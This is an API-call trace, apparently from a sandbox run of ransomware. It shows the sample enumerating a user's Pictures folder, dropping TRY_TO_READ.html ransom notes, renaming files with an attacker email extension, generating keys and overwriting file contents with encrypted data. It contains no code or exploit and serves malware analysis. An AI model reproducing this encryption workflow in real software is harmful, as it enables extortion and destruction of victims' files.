	[0100.086] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da670
	[0100.087] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0100.087] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0100.087] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ba6d8b0, ftCreationTime.dwHighDateTime=0x1d4ceec, ftLastAccessTime.dwLowDateTime=0x5276d190, ftLastAccessTime.dwHighDateTime=0x1d4d1c8, ftLastWriteTime.dwLowDateTime=0x5276d190, ftLastWriteTime.dwHighDateTime=0x1d4d1c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eZ_SLV", cAlternateFileName="")) returned 1
	[0100.087] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eZ_SLV\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ez_slv\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac
	[0100.091] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb7a350, ftCreationTime.dwHighDateTime=0x1d4cfec, ftLastAccessTime.dwLowDateTime=0x1ca04e40, ftLastAccessTime.dwHighDateTime=0x1d4c825, ftLastWriteTime.dwLowDateTime=0x1ca04e40, ftLastWriteTime.dwHighDateTime=0x1d4c825, nFileSizeHigh=0x0, nFileSizeLow=0x5a18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IeuQ91.gif", cAlternateFileName="")) returned 1
	[0100.091] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4181e180, ftCreationTime.dwHighDateTime=0x1d4d3d6, ftLastAccessTime.dwLowDateTime=0xfe7fef60, ftLastAccessTime.dwHighDateTime=0x1d4d008, ftLastWriteTime.dwLowDateTime=0xfe7fef60, ftLastWriteTime.dwHighDateTime=0x1d4d008, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j2L5tf", cAlternateFileName="")) returned 1
	[0100.091] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\j2L5tf\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\j2l5tf\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac
	[0100.093] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb0c2db00, ftCreationTime.dwHighDateTime=0x1d4c6b4, ftLastAccessTime.dwLowDateTime=0x89f98350, ftLastAccessTime.dwHighDateTime=0x1d4cbca, ftLastWriteTime.dwLowDateTime=0x89f98350, ftLastWriteTime.dwHighDateTime=0x1d4cbca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lp TYR", cAlternateFileName="LPTYR~1")) returned 1
	[0100.093] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lp TYR\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lp tyr\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac
	[0100.095] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63599b0, ftCreationTime.dwHighDateTime=0x1d4c872, ftLastAccessTime.dwLowDateTime=0x2c8774c0, ftLastAccessTime.dwHighDateTime=0x1d4d0c0, ftLastWriteTime.dwLowDateTime=0x2c8774c0, ftLastWriteTime.dwHighDateTime=0x1d4d0c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tRNMk0KDX0CN4", cAlternateFileName="TRNMK0~1")) returned 1
	[0100.095] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\tRNMk0KDX0CN4\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\trnmk0kdx0cn4\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac
	[0100.096] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca78ca50, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0100.096] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84d23630, ftCreationTime.dwHighDateTime=0x1d4c696, ftLastAccessTime.dwLowDateTime=0xcce6950, ftLastAccessTime.dwHighDateTime=0x1d4c7e1, ftLastWriteTime.dwLowDateTime=0xcce6950, ftLastWriteTime.dwHighDateTime=0x1d4c7e1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uzMai_lm74IKy7WDBJb", cAlternateFileName="UZMAI_~1")) returned 1
	[0100.097] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uzMai_lm74IKy7WDBJb\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\uzmai_lm74iky7wdbjb\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac
	[0100.098] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23199d00, ftCreationTime.dwHighDateTime=0x1d4c5e9, ftLastAccessTime.dwLowDateTime=0x793b6fd0, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0x793b6fd0, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x110ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_kxKfoV.jpg", cAlternateFileName="")) returned 1
	[0100.098] FindNextFileW (in: hFindFile=0x5da670, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23199d00, ftCreationTime.dwHighDateTime=0x1d4c5e9, ftLastAccessTime.dwLowDateTime=0x793b6fd0, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0x793b6fd0, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x110ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_kxKfoV.jpg", cAlternateFileName="")) returned 0
	[0100.098] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.098] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.098] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg", dwFileAttributes=0x80) returned 1
	[0100.098] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg") returned 51
	[0100.098] GetProcessHeap () returned 0x540000
	[0100.098] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xcc) returned 0x59d258
	[0100.098] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg"
	[0100.098] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.098] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_kxkfov.jpg"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_kxkfov.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.101] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_kxKfoV.jpg.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_kxkfov.jpg.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac
	[0100.101] GetProcessHeap () returned 0x540000
	[0100.101] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.101] GetFileSizeEx (in: hFile=0x4ac, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=69803) returned 1
	[0100.101] SetFilePointer (in: hFile=0x4ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x110ab
	[0100.101] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.101] GetProcessHeap () returned 0x540000
	[0100.101] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.101] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.101] WriteFile (in: hFile=0x4ac, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.102] WriteFile (in: hFile=0x4ac, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.102] WriteFile (in: hFile=0x4ac, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.102] ReadFile (in: hFile=0x4ac, lpBuffer=0x603bb8, nNumberOfBytesToRead=0x110ab, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603bb8*, lpNumberOfBytesRead=0x3a1f778*=0x110ab, lpOverlapped=0x0) returned 1
	[0100.103] SetFilePointer (in: hFile=0x4ac, lDistanceToMove=-69803, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.103] WriteFile (in: hFile=0x4ac, lpBuffer=0x3790048*, nNumberOfBytesToWrite=0x110ab, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesWritten=0x3a1f778*=0x110ab, lpOverlapped=0x0) returned 1
	[0100.103] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.103] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.103] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif", dwFileAttributes=0x80) returned 1
	[0100.103] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif") returned 50
	[0100.103] GetProcessHeap () returned 0x540000
	[0100.103] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xca) returned 0x59d258
	[0100.103] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif"
	[0100.103] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.103] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ieuq91.gif"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ieuq91.gif.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.108] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IeuQ91.gif.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ieuq91.gif.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac
	[0100.108] GetProcessHeap () returned 0x540000
	[0100.108] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.108] GetFileSizeEx (in: hFile=0x4ac, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=23064) returned 1
	[0100.108] SetFilePointer (in: hFile=0x4ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5a18
	[0100.108] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.108] GetProcessHeap () returned 0x540000
	[0100.108] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.108] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.108] WriteFile (in: hFile=0x4ac, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.109] WriteFile (in: hFile=0x4ac, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.109] WriteFile (in: hFile=0x4ac, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.109] ReadFile (in: hFile=0x4ac, lpBuffer=0x603bb8, nNumberOfBytesToRead=0x5a18, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x603bb8*, lpNumberOfBytesRead=0x3a1f778*=0x5a18, lpOverlapped=0x0) returned 1
	[0100.109] SetFilePointer (in: hFile=0x4ac, lDistanceToMove=-23064, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.109] WriteFile (in: hFile=0x4ac, lpBuffer=0x6095d8*, nNumberOfBytesToWrite=0x5a18, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x6095d8*, lpNumberOfBytesWritten=0x3a1f778*=0x5a18, lpOverlapped=0x0) returned 1
	[0100.111] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0100.111] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0100.111] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0100.111] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 51
	[0100.111] GetProcessHeap () returned 0x540000
	[0100.111] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xcc) returned 0x59d258
	[0100.111] lstrcpyW (in: lpString1=0x59d258, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini"
	[0100.111] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0100.111] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0100.114] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4ac
	[0100.114] GetProcessHeap () returned 0x540000
	[0100.114] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x59d258 | out: hHeap=0x540000) returned 1
	[0100.114] GetFileSizeEx (in: hFile=0x4ac, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=504) returned 1
	[0100.114] SetFilePointer (in: hFile=0x4ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1f8
	[0100.114] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0100.114] GetProcessHeap () returned 0x540000
	[0100.114] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0100.114] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0100.114] WriteFile (in: hFile=0x4ac, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0100.115] WriteFile (in: hFile=0x4ac, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0100.115] WriteFile (in: hFile=0x4ac, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0100.115] ReadFile (in: hFile=0x4ac, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x1f8, lpOverlapped=0x0) returned 1
	[0100.115] SetFilePointer (in: hFile=0x4ac, lDistanceToMove=-504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0100.115] WriteFile (in: hFile=0x4ac, lpBuffer=0x5fb588*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb588*, lpNumberOfBytesWritten=0x3a1f778*=0x1f8, lpOverlapped=0x0) returned 1
	[0100.115] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23199d00, ftCreationTime.dwHighDateTime=0x1d4c5e9, ftLastAccessTime.dwLowDateTime=0x793b6fd0, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0x793b6fd0, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x110ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_kxKfoV.jpg", cAlternateFileName="")) returned 0xffffffff
	[0100.116] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23199d00, ftCreationTime.dwHighDateTime=0x1d4c5e9, ftLastAccessTime.dwLowDateTime=0x793b6fd0, ftLastAccessTime.dwHighDateTime=0x1d4c687, ftLastWriteTime.dwLowDateTime=0x793b6fd0, ftLastWriteTime.dwHighDateTime=0x1d4c687, nFileSizeHigh=0x0, nFileSizeLow=0x110ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_kxKfoV.jpg", cAlternateFileName="")) returned 0xffffffff
	[0100.116] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xca78ca50, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xca78ca50, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da6b0
